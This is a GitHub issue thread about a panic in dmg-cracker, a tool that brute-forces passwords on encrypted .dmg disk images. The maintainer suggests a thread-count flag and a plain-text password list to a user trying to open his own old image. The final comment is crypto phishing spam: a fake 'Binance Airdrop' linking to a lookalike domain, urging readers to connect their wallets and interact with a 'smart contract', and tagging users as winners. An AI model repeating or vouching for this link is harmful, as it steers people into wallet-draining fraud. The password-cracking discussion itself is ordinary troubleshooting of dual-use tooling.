### ISSUE TITLE
thread 'main' panicked at 'chunk size must be non-zero'

### ISSUE THREAD

**Issue by velocistafpv** [james-ecd/dmg-cracker#65]
I'm receiving this:

thread 'main' panicked at 'chunk size must be non-zero'

note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

Not sure what to do. Help!

**Comment by james-ecd** [comment]
Hi! I've just updated a bunch of dependencies so worth trying again. If still not working, can you explain exactly what steps you're taking to run dmg-cracker?

**Comment by velocistafpv** [comment]
Thanks for the reply, James. Honestly, I'm not very familiar with Rust. I had just followed the instructions to install dmg-checker on my Mac's Terminal and it did install some other stuff which I'm not familiar with. After all the installation (and reinstallation after your reply), I typed in again dmg-checker -p <path to the txt file> -d <path to the dmg file> it it still gives the same error.

🔒 Attempting passwords...
thread 'main' panicked at 'chunk size must be non-zero', /Users/nazlihaffiz/.cargo/registry/src/index.crates.io-6f17d22bba15001f/dmg-cracker-0.1.5/src/lib.rs:53:10
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

Not sure what is the error about really. Help!

**Comment by james-ecd** [comment]
I'm guessing this is one of two issues.

Firstly, try manually supply a thread count using the -t arg. e.g. dmg-checker -p -d -t 4

If that doesn't work, check the formatting of your given password list. It needs to be a plain, non-formatted .txt file, with a new password on each line (followed by a \n character).

Let me know if these two solutions help at all

**Comment by velocistafpv** [comment]
Thanks James!

Another question, the passwords are what I think could be the actual
password? Is there a way to workaround since I can't recall the passwords
close to the actual on?

FYI, it is a dmg I created like 6-7 years ago. Sigh.


Best regards,

*Dr Nazli Haffiz DDS*
http://drnazlihaffiz.com

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @HScarb, @fly51fly, @iammxt, @kodekracker, @ObiajuluM, @ErikBjare, @LukeBlueLOx
